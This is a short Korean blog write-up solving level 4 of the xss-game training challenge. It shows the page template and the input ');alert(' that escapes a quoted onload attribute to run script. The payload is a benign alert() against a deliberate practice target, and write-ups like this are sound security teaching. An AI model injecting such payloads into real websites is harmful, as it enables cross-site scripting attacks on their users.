반응형
문제
https://xss-game.appspot.com/level4
https://xss-game.appspot.com/level4
Oops! Based on your browser cookies it seems like you haven't passed the previous level of the game. Please go back to the previous level and complete the challenge.
xss-game.appspot.com
문제풀이
타이머가 작동된다.
입력값이 timer 변수에 들어가고, timer.html에서 timer 변수를 이용해 이미지와 문자열을 출력한다.
<body id="level4">
<img src="/static/logos/level4.png" />
<br>
<img src="/static/loading.gif" onload="startTimer('{{ timer }}');" />
<br>
<div id="message">Your timer will execute in {{ timer }} seconds.</div>
</body>
입력값을 조작하여 img 태그에서 alert()가 실행되게 할 수 있다.
입력값이 ');alert(' 일 때, <img src="/static/loading.gif" onload="startTimer('');alert('');"/> 가 된다.
반응형
'write-up(web) > misc' 카테고리의 다른 글
| [xss-game] Level 6: Follow the 🐇 (0) | 2023.01.21 |
|---|---|
| [xss-game] Level 5: Breaking protocol (0) | 2023.01.21 |
| [xss-game] Level 3: That sinking feeling... (0) | 2023.01.21 |
| [xss-game] Level 2: Persistence is key (0) | 2023.01.21 |
| [xss-game] Level 1: Hello, world of XSS (0) | 2023.01.21 |